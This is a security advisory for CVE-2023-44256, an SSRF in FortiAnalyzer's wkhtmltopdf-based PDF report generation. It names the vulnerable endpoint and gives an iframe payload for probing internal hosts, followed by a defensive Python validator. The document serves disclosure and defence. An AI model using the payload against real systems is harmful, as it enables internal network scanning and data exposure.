
Fortinet FortiAnalyzer - SSRF wkhtmltopdf (CVE-2023-44256)

High
orange-cert-cc published GHSA-2hc5-p5mc-8vrh Oct 11, 2023

Package

FortiAnalyzer (Fortinet)

Affected versions

7.2.2

Patched versions

7.2.4

Description

Overview

PDF report generation in FortiAnalyzer contains a vulnerability that allows a remote, logged-in user to make the FortiAnalyzer issue web requests to web services on its local network and on any network it can reach. The responses to these requests are displayed in the rendered PDF.

Details

By performing this Server Side Request Forgery (SSRF), an attacker can gain access to information and web services that are normally not accessible. The attacker can also anonymize malicious actions by having the FortiAnalyzer execute them.

Proof of Concept

On the FortiAnalyzer, opening the FortiViews functionality and then Top Threat allows the generation of a PDF summarizing the data viewed.

The generation of the PDF notably involves sending HTML data in a POST request to the entry point /p/fortiview/download/pdf/.

Following receipt of this data, the server returns a PDF file containing the HTML data sent. The metadata of the generated PDF in particular reveals the software used to produce the PDF from the HTML code, along with its version: wkhtmltopdf 0.12.6-dev

This software version is outdated and affected by a public vulnerability. That weakness was used to insert HTML code that the server interprets, causing it to request neighboring resources (local network web services) and display the responses obtained in the rendered PDF.

HTML code sent as POST parameter:

X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>

To be correctly interpreted by the PDF generator, this code must be sent URL-encoded (percent-encoded) as the POST parameter value.


The HTML code is interpreted by the server-side PDF generator, which requests the specified web resources and inserts the responses obtained into the generated PDF. This allows the attacker to scan neighboring web services (or any network reachable by the FortiAnalyzer).

The above evidence shows multiple valid responses obtained from servers on the attacked FortiAnalyzer's local network.
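As an added illustration that is not part of this advisory or of Fortinet's code, the following pre-render check of the submitted HTML field decodes the URL-encoded form value, collects every tag attribute that would make the renderer fetch a resource, and rejects references to loopback, private, or non-allowlisted hosts. The sample inputs, the allowlist hostname and the function names are constructed for this example.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import quote, unquote_plus, urlsplit

# Tag/attribute pairs that make an HTML-to-PDF renderer fetch a resource.
FETCHING_ATTRS = {"iframe": "src", "frame": "src", "img": "src", "script": "src",
                  "link": "href", "object": "data", "embed": "src", "source": "src"}

# Constructed sample inputs, URL-encoded as the report endpoint expects (not the advisory's data).
HOSTILE_ENCODED = quote('10.0.0.5 <iframe src="http://10.0.0.5/" height=500 width=500></iframe>\n', safe="")
BENIGN_ENCODED = quote('<p>Top Threats</p><img src="https://reports.example.test/logo.png">', safe="")

class ResourceRefCollector(HTMLParser):
    """Collect every URL the renderer would try to load while building the PDF."""
    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        wanted = FETCHING_ATTRS.get(tag)
        for key, value in attrs:
            if key == wanted and value:
                self.refs.append((tag, value.strip()))

def reject_reason(url, allowed_hosts):
    """Return None if the URL may be fetched during rendering, else why it must not be."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return "non-http or relative reference"
    if parts.hostname in allowed_hosts:
        return None
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        # A bare hostname cannot be judged without DNS; only allowlisted names pass.
        return "hostname not allowlisted"
    if not ip.is_global:
        return "loopback, private, link-local or reserved address"
    return "address not allowlisted"

def check_report_html(form_value, allowed_hosts=frozenset()):
    """Decode the URL-encoded HTML field and list the resource references to reject."""
    collector = ResourceRefCollector()
    collector.feed(unquote_plus(form_value))
    violations = []
    for tag, url in collector.refs:
        reason = reject_reason(url, allowed_hosts)
        if reason:
            violations.append((tag, url, reason))
    return violations
```

A check on the submitted markup is only one layer: redirects and DNS answers are outside what this filter sees, so the renderer process itself should also have no network route to internal services.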

Solution

Security patch

Upgrade to a fixed version, as described in the Fortinet Security Advisory.

References

https://nvd.nist.gov/vuln/detail/CVE-2023-44256
https://www.fortiguard.com/psirt/FG-IR-19-039

Credits

Mickael Dorigny at Orange Cyberdéfense

For Hélène Saliou, Frédéric Prevost, François-Xavier Picard at Orange group

Orange CERT-CC at Orange group

Timeline

Date reported: May 31, 2023
Date fixed: October 10, 2023

Severity

High


CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CVE ID

CVE-2023-44256

Weaknesses

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.